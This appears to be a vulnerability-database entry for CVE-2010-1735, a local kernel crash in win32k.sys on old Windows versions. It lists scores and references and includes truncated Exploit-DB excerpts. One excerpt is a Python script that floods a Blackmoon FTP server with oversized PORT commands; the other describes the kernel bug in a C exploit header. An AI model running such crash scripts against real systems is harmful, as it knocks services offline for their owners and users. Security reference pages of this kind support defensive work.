CVE-2010-1735
Published 2010-05-06
CVE-2010-1735: The SfnLOGONNOTIFY function in win32k.sys in the kernel in Microsoft Windows 2000, XP, and Server 2003 allows local users to cause a denial of service (system…
Priority: P420, medium, 4.9 (CVSS 2.0)
Vector: AV:L/AC:L/Au:N/C:N/I:N/A:C
EXPLOIT
EPSS: 2.49% (82.7th percentile)
The SfnLOGONNOTIFY function in win32k.sys in the kernel in Microsoft Windows 2000, XP, and Server 2003 allows local users to cause a denial of service (system crash) via a 0x4c value in the second argument (aka the Msg argument) of a PostMessage function call for the DDEMLEvent window.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_xp | — | — |
No detection rules found.
Exploit-DB
Blackmoon FTP 3.1 Build 1735/1736 - Denial of Service
exploitdb·2011-01-13
CVE-2011-0507 Blackmoon FTP 3.1 Build 1735/1736 - Denial of Service
---
#!/usr/bin/python
# Exploit Title: BlackmoonFTP Server DOS
# Date: 12/28/2010
# Author: Craig Freyman (cd1zz)
# Software Link: http://www.mediafire.com/?bnc4d00myymmx55
# Version: 3.1 Release 6 - Build 1735 and 1736
# Tested On: Windows XP SP3
# Vendor Contacted: 12/28/2010
# Vendor Fixed: 1/13/2011
import socket
import sys
buffer = '\x41' * 600
counter = 1
if len(sys.argv) != 3:
    print "Usage: ./blackmoonDOS.py "
    sys.exit()
ip = sys.argv[1]
port = sys.argv[2]
while counter <= 300:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        print "[*] Sending evil buffer. Count " + str(counter) + " out of 300"
        s.connect((ip,int(port)))
        s.recv(1024)
        s.send('PORT ' + buffer + '\r\n')
        s.recv(1024)
        s.send('QUIT \r\n')
        s.recv(1024
Exploit-DB
Microsoft Windows XP/2000/2003 - 'win32k.sys' SfnLOGONNOTIFY Local kernel Denial of Service
exploitdb·2010-04-22
CVE-2010-1894 Microsoft Windows XP/2000/2003 - 'win32k.sys' SfnLOGONNOTIFY Local kernel Denial of Service
---
/*
Windows 2000/XP/2003 win32k.sys SfnLOGONNOTIFY local kernel Denial of Service Vulnerability
Effect : Microsoft Windows 2000/XP/2003 full patch
Author: MJ0011
Published: 2010-04-22
Vulnerability Details:
In win32k.sys, DispatchMessage finally calls xxxDefWindowProc. When handling some messages, this function
calls a function from the gapfnScSendMessage function table to process them. On 2000/XP/2003, for message
number 0x4c, a function called SfnLOGONNOTIFY is called. When wParam == 4/13/12, this function
reads data directly from lParam. Although the function uses SEH, as long as the kernel is passed a wrong address, it will still le
No writeups or analysis indexed.
http://secunia.com/advisories/39456
http://vigilance.fr/vulnerability/Windows-denials-of-service-of-win32k-sys-9607
http://www.securityfocus.com/archive/1/510884/100/0/threaded
http://www.securityfocus.com/bid/39630
Published: 2010-05-06